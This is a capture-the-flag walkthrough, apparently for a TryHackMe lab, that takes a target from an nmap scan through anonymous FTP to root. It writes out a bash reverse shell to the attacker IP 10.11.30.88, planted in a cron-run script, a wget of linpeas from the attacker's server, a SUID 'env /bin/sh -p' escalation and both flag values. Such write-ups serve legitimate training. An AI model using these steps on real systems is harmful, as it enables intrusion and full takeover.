A quite minimalistic CTF from tryhackme.com – lets dive right in:
What does nmap say?
sudo nmap -sV 10.10.51.126
There we have the first answers to the challenge: 4 Services are running, FTP on 21 and smb on 139 and 445.
Now we need to look at the smb shares:
smbclient -L10.10.51.126
Next answer: the share we are looking for is pics.
Now we are looking for the flags.
Let’s see what ftp can do for us.
ftp 10.10.51.126
Anonymous login works.
That looks good. 3 files, we can read all of them and write to the shell script. Lets download them and look into them.
get clean.sh
get removed_files.log
get to_do.txt
to_do.txt only tells us that the admin is planning to block anonymous access. Good idea but doesn*t help.
So let’s cat out removed_files.log
cat removed_files.log
Not too interesting either.
Let’s move on to the bash script.
cat clean.sh
Now things are beginning to make sense.
clean.sh writes into the removed_files.log. Knowing that there where a lot of lines in the log file we can assume that clean.sh is automatically and periodically called by a cron job.
We also know that we can write to the file. So let’s just plant a reverse shell into that script, setup netcat on our side and see if we get a shell when eventually on the target the cron job fires.
#!/bin/bash
exec 5<>/dev/tcp/10.11.30.88/1234
cat <&5 | while read line; do $line 2>&5 >&5; done
And in out ftp session:
put clean.sh clean.sh
On our local machine we start our usual netcat listener
nc -l 1234
and wait …
And here we go. Let’s look around.
whoami
pwd
ls -la
We found the user flag
90d6f992585815ff991e68748c414740
To get ideas on how to become root let’s use linpeas.
We start a webserver locally and upload the file to our target.
So on our local machine:
python3 -m http.server
And on the target machine:
wget http://10.11.30.88:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
In the SUID sections we find this line
-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env
With this we find something on
https://gtfobins.github.io/gtfobins/env/#suid
From there we use
env /bin/sh -p
and we are root.
whoami
root
cat /root/root.txt
So our root flag is
4d930091c31a622a7ed10f27999af363